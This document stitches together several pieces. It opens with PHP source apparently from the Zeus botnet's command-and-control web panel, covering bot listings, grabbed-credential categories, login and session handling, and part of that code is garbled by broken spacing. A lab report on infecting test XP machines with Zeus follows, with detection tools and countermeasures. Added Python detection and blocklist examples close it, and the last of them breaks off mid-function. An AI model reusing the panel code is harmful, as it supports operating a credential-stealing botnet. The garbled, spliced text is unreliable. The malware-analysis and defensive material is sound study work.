    case BLT_GRABBED_WSOCKET:     return LNG_BLT_GRABBED_WSOCKET;
    case BLT_GRABBED_FTPSOFTWARE: return LNG_BLT_GRABBED_FTPSOFTWARE;
    case BLT_GRABBED_OTHER:       return LNG_BLT_GRABBED_OTHER;
  }
  return LNG_BLT_UNKNOWN;
}

/*
  fnmatch substitute for Windows.

  IN $pattern - string, mask.
  IN $string  - string, the string to test.

  Return - bool, true on a match, false otherwise.
*/
if(!function_exists('fnmatch'))
{
  function fnmatch($pattern, $string)
  {
    return @preg_match('#^'.strtr(preg_quote($pattern, '#'), array('\\*' => '.*', '\\?' => '.?')).'$#i', $string);
  }
}
/*
  Determine whether the string contains whitespace.

  IN $str - string, the string to check.

  Return - true if whitespace is present, false otherwise.
*/
function spacechars_exists($str)
{
  return strpbrk($str, "\x20\x09\x0A\x0B\x0D") === false ? false : true;
}

/*
  Convert a logical expression into an array of tokens.

  IN $exp - string, expression.

  Return - array, list of [token, type] pairs; type 1 means the token was quoted, 0 means it was bare.
*/
function ExpToArray($exp)
{
  $list = array();
  $len  = strlen($exp);
  for($i = 0; $i < $len; $i++)
  {
    $cur = ord($exp[$i]);
    // Skip whitespace characters.
    if($cur == 0x20 || ($cur >= 0x9 && $cur <= 0xD)) continue;

    // Check for quotes.
    if($cur == 0x22 || $cur == 0x27)
    {
      for($j = $i + 1; $j < $len; $j++) if(ord($exp[$j]) == $cur)
      {
        // Count the number of backslashes in front of the quote.
        $c = 0;
        for($k = $j - 1; ord($exp[$k]) == 0x5C; $k--) $c++;
        if($c % 2 == 0) break; // With an even number of backslashes the quote is not escaped, so it closes the token.
      }
      if($j != $len) $i++; // If the end was not reached, strip the opening quote.
      $type = 1;
    }
    // Plain token: copy up to the first whitespace character.
    else
    {
      for($j = $i + 1; $j < $len; $j++)
      {
        $cur = ord($exp[$j]);
        if($cur == 0x20 || ($cur >= 0x9 && $cur <= 0xD)) break;
      }
      $type = 0;
    }
    $list[] = array(substr($exp, $i, $j - $i), $type);
    $i = $j;
  }
  return $list;
}

/*
  Compare a string against a logical expression.

  IN $str    - string, the string.
  IN $exp    - string, expression.
  IN $cs     - bool, if true the comparison is case-sensitive (BINARY), otherwise insensitive.
  IN $strong - bool, see the code.

  Return - true if the string matches the expression, false otherwise.
*/
function MatchStringInExpString($str, $exp, $cs, $strong)
{
  $exp = trim($exp);
  if($exp == '' || $exp == '*') return true;
  $list = ExpToArray($exp);

  // PCRE settings.
  $pcre_pre = ($strong ? '#^' : '#');
  $pcre_aft = ($strong ? '$#' : '#').($cs ? 'u' : 'iu');

  // Process the tokens.
  $q_prev = $q_cur = 0;
  $retVal = false;
  foreach($list as $item)
  {
    if($item[1] == 0)
    {
      $skip = 0;
      if(strcmp($item[0], 'OR') === 0) $q_cur = 0;
      else if(strcmp($item[0], 'AND') === 0) $q_cur = 1;
      else if(strcmp($item[0], 'NOT') === 0) $q_cur = 2;
      else $skip = 1;
      if($skip == 0){$q_prev = $q_cur; continue;}
    }

    // Compare.
    $r = preg_match($pcre_pre.strtr(preg_quote($item[0], '#'), array('\\*' => '.*', '\\?' => '.?')).$pcre_aft, $str);

    // The logic here is not certain.
    switch($q_cur)
    {
      case 0: // OR
        if($r > 0) $retVal = true;
        break;
      case 1: // AND
        if($r > 0) break;
        return false;
      case 2: // NOT
        if($r > 0) return false;
        break;
    }
  }
  return $retVal;
}
/*
  Convert a logical expression into a WHERE condition for an SQL query.

  IN $exp    - string, expression.
  IN $column - string, column name.
  IN $cs     - bool, if true case-sensitive, otherwise insensitive.
  IN $strong - bool, see the code.

  Return - string, the condition.
*/
function ExpToSQL($exp, $column, $cs, $strong)
{
  $exp = trim($exp);
  if($exp == '' || $exp == '*') return '';
  $list = ExpToArray($exp);

  // Process the tokens. Terms that are not separated by a keyword are joined with AND.
  $query  = '';
  $q_addv = '';
  $q_prev = $q_cur = ' AND ';
  foreach($list as $item)
  {
    if($item[1] == 0)
    {
      $skip = 0;
      if(strcmp($item[0], 'OR') === 0){$q_cur = ' OR '; $q_addv = '';}
      else if(strcmp($item[0], 'AND') === 0){$q_cur = ' AND '; $q_addv = '';}
      else if(strcmp($item[0], 'NOT') === 0){$q_cur = ' AND '; $q_addv = ' NOT';}
      else $skip = 1;
      if($skip == 0)
      {
        if($q_cur != $q_prev && !empty($query)) $query = '('.$query.')';
        $q_prev = $q_cur;
        continue;
      }
    }

    // Escape the LIKE metacharacters % and _ in the term.
    $s = str_replace(array('%', '_'), array('\\\\%', '\\\\_'), $item[0]);

    // Substitute the * and ? wildcards (only when they are not backslash-escaped).
    $len = strlen($s);
    for($i = 0; $i < $len; $i++) if(($c = ord($s[$i])) == 0x2A || $c == 0x3F)
    {
      // Count the number of backslashes.
      $cc = 0;
      for($k = $i - 1; $k >= 0 && ord($s[$k]) == 0x5C; $k--) $cc++;
      // Substitute.
      if($cc % 2 == 0) $s[$i] = $c == 0x2A ? '%' : '_';
    }
    $s = stripslashes($s);
    if(!$strong) $s = '%'.$s.'%';

    $query .= (empty($query) ? '' : $q_cur).$column.$q_addv.' LIKE '.($cs ? 'BINARY ' : '').'\''.addslashes($s).'\'';
  }
  return '('.$query.')';
}

/*
  Check whether a path is safe (contains none of the characters '\', '/', '\0').

  IN $str - string, the string to check.

  Return - bool, true if the path is safe, false if it is not.
*/
function SafePath($str)
{
  return (strpos($str, "/") === false && strpos($str, "\\") === false && strpos($str, "\0") === false);
}
/*
  Output the login form.

  IN $show_error - bool, whether to display the message about an incorrect username/password.
*/
function ShowLoginForm($show_error)
{
  $page = $show_error ? THEME_STRING_FORM_ERROR_1_BEGIN.'Bad user name or password.'.THEME_STRING_FORM_ERROR_1_END : '';
  $page .=
    str_replace(array('{NAME}', '{URL}', '{JS_EVENTS}'), array('login', QUERY_STRING_BLANK_HTML.'login', ''), THEME_FORMPOST_BEGIN).
    str_replace('{WIDTH}', 'auto', THEME_DIALOG_BEGIN).
    str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, 'Login'), THEME_DIALOG_TITLE).
    THEME_DIALOG_ROW_BEGIN.
    str_replace('{COLUMNS_COUNT}', 1, THEME_DIALOG_GROUP_BEGIN).
    THEME_DIALOG_ROW_BEGIN.
    str_replace('{TEXT}', 'User name:', THEME_DIALOG_ITEM_TEXT).
    str_replace(array('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array('', 'user', '255', '200px'), THEME_DIALOG_ITEM_INPUT_TEXT).
    THEME_DIALOG_ROW_END.
    THEME_DIALOG_ROW_BEGIN.
    str_replace('{TEXT}', 'Password:', THEME_DIALOG_ITEM_TEXT).
    str_replace(array('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array('', 'pass', '255', '200px'), THEME_DIALOG_ITEM_INPUT_PASS).
    THEME_DIALOG_ROW_END.
    THEME_DIALOG_ROW_BEGIN.
    THEME_DIALOG_ITEM_EMPTY.
    str_replace(array('{COLUMNS_COUNT}', '{VALUE}', '{NAME}', '{JS_EVENTS}', '{TEXT}'), array(1, 1, 'remember', '', 'Remember (MD5 cookies)'), THEME_DIALOG_ITEM_INPUT_CHECKBOX_2).
    THEME_DIALOG_ROW_END.
    THEME_DIALOG_GROUP_END.
    THEME_DIALOG_ROW_END.
    str_replace('{COLUMNS_COUNT}', 2, THEME_DIALOG_ACTIONLIST_BEGIN).
    str_replace(array('{TEXT}', '{JS_EVENTS}'), array('Submit', ''), THEME_DIALOG_ITEM_ACTION_SUBMIT).
    THEME_DIALOG_ACTIONLIST_END.
    THEME_DIALOG_END;
  ThemeSmall('login', $page.THEME_FORMPOST_END, 0, 0, 0);
}

/*
  Create the list of available botnets as a THEME_DIALOG_ITEM_LISTBOX.

  IN $current_botnet - string, name of the current botnet, or '' if no botnet is selected.
  IN $adv_query      - additional data for the HTTP request that switches the botnet.

  Return - string, a ListBox named 'botnet' and a button that switches the botnet.
*/
function BotnetsToListBox($current_botnet, $adv_query)
{
  $adv_query = htmlentities_ex($adv_query);
  $botnets =
    str_replace(array('{NAME}', '{WIDTH}'), array('botnet', 'auto'), THEME_DIALOG_ITEM_LISTBOX_BEGIN).
    str_replace(array('{VALUE}', '{TEXT}'), array('', LNG_BOTNET_ALL), THEME_DIALOG_ITEM_LISTBOX_ITEM);
  if(($r = @mysql_query('SELECT DISTINCT botnet FROM botnet_list'))) while(($m = @mysql_fetch_row($r))) if($m[0] != '')
  {
    $botnets .= str_replace(array('{VALUE}', '{TEXT}'),
                            array(htmlentities_ex(urlencode($m[0])), htmlentities_ex(mb_substr($m[0], 0, BOTNET_MAX_CHARS))),
                            strcmp($current_botnet, $m[0]) === 0 ? THEME_DIALOG_ITEM_LISTBOX_ITEM_CUR : THEME_DIALOG_ITEM_LISTBOX_ITEM);
  }
  $botnets .= THEME_DIALOG_ITEM_LISTBOX_END.' '.
    str_replace(array('{TEXT}', '{JS_EVENTS}'),
                array(LNG_BOTNET_APPLY, 'onclick="var botnet = document.getElementById(\'botnet\'); window.location = \''.QUERY_STRING_HTML.$adv_query.'&botnet=\' + botnet.options[botnet.selectedIndex].value;"'),
                THEME_DIALOG_ITEM_ACTION);
  return $botnets;
}
/*
  Create a table with the list of page numbers.

  IN $total_pages  - int, number of pages.
  IN $current_page - int, the current page.
  IN $js           - string, JavaScript for the onclick event, where {P} is the page number.

  Return - string, the list of pages.
*/
function ShowPageList($total_pages, $current_page, $js)
{
  $list = array();
  $visible_pages = 5; // Radius of visible pages around the current one.

  // Compute the range of visible pages.
  $min_visible = $current_page - $visible_pages;
  $max_visible = $current_page + $visible_pages;
  if($min_visible < 1) $max_visible -= $min_visible - 1; // Add back the pages that fell below 1.
  else if($max_visible > $total_pages) $min_visible -= ($max_visible - $total_pages); // Take back the pages that went past $total_pages.

  $q_min = false;
  $q_max = false;
  for($i = 1; $i <= $total_pages; $i++)
  {
    // Current page.
    if($i == $current_page) $list[] = array($i, 0);
    else
    {
      // Invisible page: emit a single ellipsis entry on each side.
      if($i != 1 && $i != $total_pages && ($i < $min_visible || $i > $max_visible))
      {
        if($i < $min_visible && $q_min == false)
        {
          $list[] = array(0, 0);
          $q_min = true;
        }
        else if($i > $max_visible && $q_max == false)
        {
          $list[] = array(0, 0);
          $q_max = true;
        }
      }
      // Visible pages.
      else $list[] = array($i, str_replace('{P}', $i, $js));
    }
  }
  return ThemePageList($list,
                       $current_page > 1 ? str_replace('{P}', 1, $js) : 0,
                       $current_page > 1 ? str_replace('{P}', $current_page - 1, $js) : 0,
                       $current_page < $total_pages ? str_replace('{P}', $total_pages, $js) : 0,
                       $current_page < $total_pages ? str_replace('{P}', $current_page + 1, $js) : 0
                       );
}
/*
  Create a JavaScript menu from $_BOT_MENU.

  IN $name - string, name of the menu.

  Return - string, a JavaScript variable holding the menu contents.
*/
function GetBotJSMenu($name)
{
  global $_BOT_MENU;
  $output = '';
  $i = 0;
  foreach($_BOT_MENU as $item)
  {
    if($i++ != 0) $output .= ',';
    if($item[0] === 0) $output .= '[0]';
    else $output .= '[\''.addjsslashes(htmlentities_ex($item[1])).'\', \''.addjsslashes(QUERY_SCRIPT_HTML.'?botsaction='.htmlentities_ex(urlencode($item[0])).'&bots[]=$0$').'\']';
  }
  return 'var '.$name.' = ['.$output.'];';
}

/*
  Create the popup menu for a bot.

  IN $botid    - string, the bot ID. Do not apply htmlentities_ex or urlencode beforehand.
  IN $menuname - string, name of the menu; simply the name of the JavaScript variable created by GetBotJSMenu.

  Return - string, the popup menu.
*/
function BotPopupMenu($botid, $menuname)
{
  if(!isset($GLOBALS['_next_bot_popupmenu__'])) $GLOBALS['_next_bot_popupmenu__'] = 100;
  return str_replace(array('{ID}', '{MENU_NAME}', '{BOTID_FOR_URL}', '{BOTID}'),
                     array($GLOBALS['_next_bot_popupmenu__']++, $menuname, htmlentities_ex(urlencode($botid)), htmlentities_ex($botid)),
                     THEME_POPUPMENU_BOT);
}

/*
  Create a sortable column header.

  IN $text   - string, column name.
  IN $col_id - int, column ID.
  IN $num    - bool, true - the column displays numbers, false - the column displays text.

  Return - string, the column header.
*/
function WriteSortColumn($text, $col_id, $num)
{
  global $_SORT_ORDER, $_SORT_COLUMN_ID;
  if($num) $theme = $_SORT_COLUMN_ID == $col_id ? ($_SORT_ORDER == 0 ? THEME_LIST_HEADER_R_SORT_CUR_ASC : THEME_LIST_HEADER_R_SORT_CUR_DESC) : THEME_LIST_HEADER_R_SORT;
  else $theme = $_SORT_COLUMN_ID == $col_id ? ($_SORT_ORDER == 0 ? THEME_LIST_HEADER_L_SORT_CUR_ASC : THEME_LIST_HEADER_L_SORT_CUR_DESC) : THEME_LIST_HEADER_L_SORT;
  return str_replace(array('{COLUMNS_COUNT}', '{URL}', '{JS_EVENTS}', '{TEXT}', '{WIDTH}'),
                     array(1, '#', 'onclick="return SetSortMode('.$col_id.', '.($_SORT_COLUMN_ID == $col_id ? ($_SORT_ORDER == 0 ? 1 : 0) : $_SORT_ORDER).')"', $text, 'auto'),
                     $theme);
}

/*
  JS code for changing the sort order.

  IN $url - string, URL.

  Return - string, JS code.
*/
function JSSetSortMode($url)
{
  return "function SetSortMode(mode, ord){window.location = '{$url}&smode=' + mode + '&sord=' + ord; return false;}\r\n";
}

/*
  JS code for initializing an XMLHttpRequest object.

  IN $var - string, name of the variable for the object.

  Return - string, JS code.
*/
function JSXMLHttpRequest($var)
{
  return
    "try{{$var} = new ActiveXObject('Msxml2.XMLHTTP');}".
    "catch(e1)".
    "{".
      "try{{$var} = new ActiveXObject('Microsoft.XMLHTTP');}".
      "catch(e2){{$var} = false;}".
    "}".
    "if(!{$var} && typeof XMLHttpRequest != 'undefined'){{$var} = new XMLHttpRequest();}".
    "if(!{$var}) alert('ERROR: Failed to create XMLHttpRequest.');";
}
/*
  JS code for mass control of checkboxes.

  IN $form - string, name of the form to process.
  IN $cb   - string, name of the master checkbox.
  IN $arr  - string, name of the dependent checkboxes.

  Return - string, JS code.
*/
function JSCheckAll($form, $cb, $arr)
{
  return
    "function CheckAll(){".
      "var bl = document.forms.namedItem('{$form}').elements;".
      "var ns = bl.namedItem('{$cb}').checked;".
      "for(var i = 0; i < bl.length; i++) if(bl.item(i).name == '{$arr}') bl.item(i).checked = ns;".
    "}\r\n";
}

/*
  Get the sort order from the GET request.

  IN $sm - array, list of available sort modes.

  Return - string, URL suffix for the current sort mode.
*/
function AssocateSortMode($sm)
{
  $GLOBALS['_SORT_COLUMN']    = $sm[0]; // Column.
  $GLOBALS['_SORT_COLUMN_ID'] = 0;      // Column ID.
  $GLOBALS['_SORT_ORDER']     = 0;      // Direction, 0 = ASC, 1 = DESC.

  if(!empty($_GET['smode']) && is_numeric($_GET['smode']))
  {
    if(isset($sm[$_GET['smode']]))
    {
      $GLOBALS['_SORT_COLUMN']    = $sm[$_GET['smode']];
      $GLOBALS['_SORT_COLUMN_ID'] = intval($_GET['smode']);
    }
  }
  if(!empty($_GET['sord']) && is_numeric($_GET['sord'])) $GLOBALS['_SORT_ORDER'] = $_GET['sord'] == 1 ? 1 : 0;

  if($GLOBALS['_SORT_COLUMN_ID'] !== 0 || $GLOBALS['_SORT_ORDER'] !== 0) return '&smode='.$GLOBALS['_SORT_COLUMN_ID'].'&sord='.$GLOBALS['_SORT_ORDER'];
  return '';
}

/*
  Add the current sort mode to a form as hidden values.
*/
function AddSortModeToForm()
{
  return str_replace(array('{NAME}', '{VALUE}'), array('smode', $GLOBALS['_SORT_COLUMN_ID']), THEME_FORM_VALUE).
         str_replace(array('{NAME}', '{VALUE}'), array('sord', $GLOBALS['_SORT_ORDER']), THEME_FORM_VALUE);
}

/*
  Get the list of all subdirectories.

  IN $path - string, path to search.

  Return - array, list of directories, or false on failure.
*/
function getdirs($path)
{
  $r = array();
  if(($dh = @opendir($path)) === false) return false;
  else
  {
    while(($file = @readdir($dh)) !== false) if(strcmp($file, '.') !== 0 && strcmp($file, '..') !== 0 && @is_dir($path.'/'.$file)) $r[] = $file;
    @closedir($dh);
  }
  return $r;
}

/*
  Delete files and folders recursively.

  IN $path - string, full path.

  Return - true if the path was removed successfully, false on error.
*/
function ClearPath($path)
{
  @chmod($path, 0777);
  if(@is_dir($path))
  {
    if(($dh = @opendir($path)) !== false)
    {
      while(($file = readdir($dh)) !== false) if(strcmp($file, '.') !== 0 && strcmp($file, '..') !== 0)
      {
        if(!ClearPath($path.'/'.$file)) return false;
      }
      @closedir($dh);
    }
if (! @ rmdir ($ path)) return false;
}
else if (is_file ($ path))
{
if (! @ unlink ($ path)) return false; }
return true; }
/ * Otimiziruet menu, removing items from it zapreshennye.
IN OUT $ menu - array, the menu for processing. IN $ allow_fsep - bool, keep the top separator.
* /
function OptimizeMenu (& $ menu, $ save_fsep) {
global $ _USER_DATA;
foreach ($ menu as $ key => $ item) foreach ($ item [2] as $ r) if (empty ($ _USER_DATA [$ r])) {unset ($ menu [$ key]); break;}
/ / Remove unnecessary separators. $ Sep = -1;
$ I = 0;
foreach ($ menu as $ key => $ item) {
if ($ item [0] === 0)
{ if ($ i == 0 & &! $ save_fsep) unset ($ menu [$ key]);
else if ($ sep! == -1) unset ($ menu [$ sep]);
$ Sep = $ key; }
else {
$ Sep = -1;
$ I + +; }
}
if ($ sep! == -1) unset ($ menu [$ sep]);
}
////////////////////////////////////////////////// /////////////////////////////
/ / Session management.
////////////////////////////////////////////////// /////////////////////////////
/ *
Capture Session * /
$ _SESSIONIN = 0;
function LockSession ()
{
global $ _SESSIONIN; if ($ _SESSIONIN == 0)
{
@ Session_set_cookie_params (SESSION_LIVETIME, CP_HTTP_ROOT); @ Session_name (COOKIE_SESSION);
@ Session_start ();
} $ _SESSIONIN + +;
}
/ *
Exemption session
* / function UnlockSession ()
{
global $ _SESSIONIN; if ($ _SESSIONIN> 0 & & - $ _SESSIONIN == 0) session_write_close ();
}
/ *
Destroying session
* / function UnlockSessionAndDestroyAllCokies ()
{
global $ _SESSIONIN; $ _SESSIONIN = 0;
if (isset ($ _SESSION)) foreach ($ _SESSION as $ k => $ v) unset ($ _SESSION [$ k]);
@ Session_unset (); @ Session_destroy ();
@ Setcookie (COOKIE_SESSION,'', 0, CP_HTTP_ROOT); @ Setcookie (COOKIE_USER,'', 0, CP_HTTP_ROOT);
@ Setcookie (COOKIE_PASS,'', 0, CP_HTTP_ROOT);
} ?>
The answer is to use zse.exe to see the infection and fix it.
Conclusion
From the data collection of running the Zeus system configuration for approximately ten hours, there was a noticeable amount of traffic from the infected host to the web server. The goals were achieved to a level that is satisfactory to answer some basic questions of what Zeus does: how to detect what is going on within the infected host, which XP security-level configurations were impacted, how easy Zeus is to set up and use, and what countermeasures can be used to prevent infection.
From inspection of the Zeus "cp.php" and "gate.php" files, along with the "zse.exe" configuration setup file, you can see many of the data-gathering methods and functions. This shows evidence of data capturing and of data transfers being made from a host to a web server. From the Wireshark summary, packet transfer is occurring between the infected host and the web server. Those packets do not insert data into the web server's MySQL database; however, that is a minor detail which doesn't hamper the intent of this experiment. It is likely due to a missing PHP file or a required help file needed to correct that missing link. In the "cp.php" and "gate.php" files it is not hard to see the relationships of the data repository actions that are supposed to take place on the web server.
In the IDA Pro results from the "bt.exe" and "zse.exe" files we see there are many functions it will be running on the infected host. Somewhere in the execution of "bt.exe" a spawn activity occurs to create another executable called "sdra64.exe." Also, the Log (user.ds) and Config (local.ds) files were generated in a created directory named "lowsec", which assists the data collection process. The output of Procmon is very detailed and shows the actual changes that occur on the infected host. I experienced a continuous rebooting of the infected host. It would not enter back into the regular boot process; it would display a blue-screen error. This is shown in the screenshots taken during the execution of the attack of "bt.exe" on the infected host. The characteristics that Dell SecureWorks lists can be verified with the output files from InCtrl5 and Procmon. However, some claims they made I did not validate, such as FTP and POP accounts being stolen, as my system had neither configured.
The tools used to detect this complex Zeus malware program were selected at the beginning of and during the examination of the infected host. The assignments over the coursework provided the necessary tools and techniques to properly assess the malware portion running on the infected host. The most useful one was InCtrl5. Procmon in conjunction with WinMerge "before" and "after" shots was very detailed but required a lot of time compared to InCtrl5, which was quick and pretty accurate in recovering all of the correct information as seen in the media articles. The given malware tool utility "zse.exe" will detect and clean the virus from the infected host. It will show a brief summary of the key files that are found on infected systems but not everything it causes. The appreciation of how complex Zeus is can be seen in the dissection of the assembly language code traced by IDA Pro. With more practice and an unlimited amount of time one could describe the code with more precision than what the other tools were able to report; however, it would be overkill for this experiment. IDA Pro would be a nice tool to master when doing this kind of exercise over and over in order to get more exact and refined details out of it. Wireshark provided the simple relationship between the infected host and the web server. The payloads were encrypted (assuming this since there wasn't any plaintext) with methods (Zeus uses RC4 encryption) within the "zse.exe" configuration and web install "index.php." Both executions required the public key to process the automatic configurations. Wireshark shows the traffic type was mainly HTTP connections and many different ports were attempted. We could use some cryptography tools in this experiment and see if we could reveal the payloads since we do have the encryption mechanism and public key. We would need to discover the private key of the Zeus program. That process could take a lot of work and may not be possible or feasible.
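The before/after comparison that InCtrl5 and the Procmon-plus-WinMerge workflow perform can be scripted so that the host artifacts named above (sdra64.exe, the lowsec directory, user.ds and local.ds) are flagged automatically. The following Python is an added example and not code from the paper or from any of the tools it names; the snapshot format (one "path|size|md5" line per file) and every path and hash in the sample snapshots are constructed for illustration.

```python
"""Compare 'before' and 'after' host snapshots and flag the ZeuS artifacts
named in the write-up (sdra64.exe, the lowsec directory, user.ds, local.ds).

Added example, not part of the original paper or of any tool it names.
The snapshot format (one 'path|size|md5' line per file) and the sample
entries below are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Artifact names the paper reports on the infected host (matched case-insensitively).
# File names come first so a hit is reported against the file, not its directory.
ZEUS_INDICATORS = ("sdra64.exe", "user.ds", "local.ds", "lowsec")


@dataclass(frozen=True)
class Entry:
    size: int
    md5: str


def parse_snapshot(text: str) -> Dict[str, Entry]:
    """Parse 'path|size|md5' lines into a dict keyed by lower-cased path."""
    entries: Dict[str, Entry] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        path, size, md5 = line.split("|")
        entries[path.strip().lower()] = Entry(int(size), md5.strip().lower())
    return entries


def diff_snapshots(before: Dict[str, Entry], after: Dict[str, Entry]) -> Dict[str, List[str]]:
    """Return added, removed and modified paths, like an InCtrl5 report."""
    added = sorted(p for p in after if p not in before)
    removed = sorted(p for p in before if p not in after)
    modified = sorted(p for p in after if p in before and after[p] != before[p])
    return {"added": added, "removed": removed, "modified": modified}


def flag_indicators(paths: List[str]) -> List[Tuple[str, str]]:
    """Return (path, indicator) pairs for paths containing a known artifact name."""
    hits = []
    for p in paths:
        for ind in ZEUS_INDICATORS:
            if ind in p:  # paths were lower-cased by parse_snapshot
                hits.append((p, ind))
                break
    return hits


# Constructed sample snapshots (paths, sizes and hashes are illustrative only).
BEFORE = """
c:\\windows\\system32\\ntdll.dll|706048|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
c:\\windows\\system32\\winlogon.exe|507904|bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
c:\\windows\\prefetch\\layout.ini|1024|cccccccccccccccccccccccccccccccc
"""
AFTER = """
c:\\windows\\system32\\ntdll.dll|706048|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
c:\\windows\\system32\\winlogon.exe|507904|bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
c:\\windows\\prefetch\\layout.ini|1536|dddddddddddddddddddddddddddddddd
c:\\windows\\system32\\sdra64.exe|129024|eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
c:\\windows\\system32\\lowsec\\user.ds|2048|ffffffffffffffffffffffffffffffff
c:\\windows\\system32\\lowsec\\local.ds|4096|99999999999999999999999999999999
"""


def analyse(before_text: str = BEFORE, after_text: str = AFTER) -> Dict[str, object]:
    """Diff the two snapshots and check new/changed paths against the indicator list."""
    changes = diff_snapshots(parse_snapshot(before_text), parse_snapshot(after_text))
    suspicious = flag_indicators(changes["added"] + changes["modified"])
    return {"changes": changes, "indicators": suspicious}


if __name__ == "__main__":
    report = analyse()
    for kind, paths in report["changes"].items():
        print(f"{kind}: {len(paths)}")
        for p in paths:
            print("   ", p)
    print("indicator hits:")
    for path, ind in report["indicators"]:
        print(f"    {path}  <- {ind}")
```

The diff alone reproduces what WinMerge shows between two listings; the indicator pass is what turns a long list of changes into the short summary the paper wanted from zse.exe. A legitimate change (the prefetch file here) is reported as modified but not flagged, which is the distinction an analyst needs when the "after" snapshot is hundreds of lines long.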
The security levels of the XP systems were simple to configure and ranged from basic to complex. There was the standard build without a service pack and no AV, then a moderately protected XP, and then the most hardened XP system possible. The security flaws were not found on the lowest baseline of XP with no AV installed. So something changed in the later builds of XP that have Service Pack 3 or higher to open a vulnerability that Zeus could penetrate through. All the systems with AV were capable of detecting and rejecting this version of Zeus; however, media literature shows that further developed Zeus platforms will elude AV. The mechanism which would allow this to be successful is based on the random encryption practices that Zeus has been implementing.
The first line of defense was AV. I did not anticipate that the AV would prevent the executable from running, but it does just that. It worked this time, but will it later? To improve upon this experiment I would like to set up a different trial set identical to this one but subtracting the known suspects that will refuse the infection based on having AV installed. The next layer of defense after AV is having full updates and removing unused services and closing unused ports. After that you can take another step and secure and restrict system-level scripts and executables that can operate at the system level. How well would the DoD system at low and high classification protection, without the AV installed, do against the Zeus attack?
The ease of use in my experience with this program is a rating of "difficult" to configure and use. Many software vendors that charge you for product support usually do so because their product is not as intuitive as running office suite products. I have experience with web development and know PHP and MySQL well enough to develop a working site that is useful. This type of project was not out of my field of expertise. It was hard to determine if you are missing a critical file. There weren't any help instructions to tweak possible web service configurations. There weren't any help files or forums to guide you through the process. I did not have an easy time locating a working copy of the software and did get a version that was not the original one or the latest one. You have to pay for it all and find out where to pay. The common files that I had were from a basic template or a modified experimental one; I can't be sure either way. There wasn't any MD5 hash to compare to see what I was supposed to be working with and whether my set of files was altered or not. I have done the best with what I found. Getting it all going is difficult.
After you get over the stumps the rest of it is easy. It does have that kiddie script that builds the required functioning executables and has the self-configuring database along with the ready-to-go website server. The website worked but it was an empty shell since the data never populated. Did I have it configured right or wrong, or is there a time delay before the data collector sends it at "m" minutes or "h" hours later? I gave it almost ten hours and saw no data online from the command site.
The countermeasures to prevent this infection in this scenario are simple. Use a good AV and keep the signature files up to date. However, future implementations of Zeus will defeat or have defeated AV. Other steps must be taken to protect the host from infection. Dell SecureWorks had some good advice on how to protect yourself from being a victim of Zeus's goal of stealing your banking information. SecureWorks suggests "businesses and home users carry out online banking and financial transactions on isolated workstations that are not used for general Internet activities, such as web browsing and reading email which could increase the risk of infection." For networks and home users the solutions will vary.
To combat malware you need an infrastructure with built-in security. There is a lot of sensitive data out there. How useful is the data if the data can't be viewed? It would be worthless and the effort would be wasted. I agree with the posting in the forum from our class related to the Germany citation[10] that would impose a fine on users that didn't secure their wireless routers if their router was used as the dummy network to commit a crime. Along similar lines, the more doors we close or secure, the less opportunity there is out there for criminals to go through. Pretty Good Privacy (PGP)[11] is free and not easy to configure but works well to secure data files and emails. In advanced firewall appliances or software firewalls you should implement a blackhole list or a proxy that filters known websites and domains of Zeus and denies access to them. There is a supported list for Zeus called "abuse.ch ZeuS removal list."[12] The proper security architectures need to be designed and used throughout the many networks to prevent the bots from spreading and from collecting useful information.
10 http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/ ; http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning
11 http://www.openpgp.org/
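The blackhole-list or filtering-proxy control described above comes down to one decision per outbound request: is the destination host, or any parent domain of it, on the published ZeuS list? The Python below is an added example, not code from the paper or from abuse.ch; it assumes a one-host-per-line list format with "#" comments (the real list's format is not given in the paper), and every host, address and proxy log line in it is constructed for illustration.

```python
"""Blackhole-list check for an egress proxy: deny requests whose destination
host is on a ZeuS C&C blocklist such as the abuse.ch list the paper cites.

Added example, not code from the paper or from abuse.ch. The list format
(one host per line, '#' comments) is assumed, and every host and log line
below is constructed for illustration.
"""
from typing import Iterable, List, Set, Tuple
from urllib.parse import urlsplit


def load_blocklist(text: str) -> Set[str]:
    """Parse one-host-per-line text; ignores blank lines and '#' comments."""
    hosts = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().lower()
        if line:
            hosts.add(line.rstrip("."))
    return hosts


def host_of(url: str) -> str:
    """Extract the lower-cased hostname from a request URL (port and userinfo dropped)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return (parts.hostname or "").lower()


def is_blocked(host: str, blocklist: Set[str]) -> bool:
    """True if host or any parent domain is listed, so sub.bad.example matches bad.example.

    Walking the label hierarchy instead of doing a substring test means that
    'notcc-panel.example' does NOT match a listed 'cc-panel.example'.
    """
    labels = host.split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in blocklist:
            return True
    return False


def filter_requests(log_lines: Iterable[str], blocklist: Set[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, url, decision) for each 'client_ip url' proxy log line."""
    decisions = []
    for line in log_lines:
        if not line.strip():
            continue
        client, url = line.split(None, 1)
        decision = "DENY" if is_blocked(host_of(url.strip()), blocklist) else "ALLOW"
        decisions.append((client, url.strip(), decision))
    return decisions


# Constructed blocklist (placeholder entries, not real C&C addresses).
BLOCKLIST_TEXT = """
# Constructed ZeuS C&C blocklist (placeholder entries)
cc-panel.example
gate-host.example.net
203.0.113.45
"""

# Constructed proxy log lines: client IP, then the requested URL.
PROXY_LOG = [
    "192.168.56.101 http://cc-panel.example/gate.php",
    "192.168.56.101 http://update.CC-PANEL.example/cfg.bin",
    "192.168.56.102 http://www.wireshark.org/",
    "192.168.56.103 http://203.0.113.45/index.php",
    "192.168.56.104 http://notcc-panel.example/",
]


def run(log_lines=PROXY_LOG, blocklist_text=BLOCKLIST_TEXT) -> List[Tuple[str, str, str]]:
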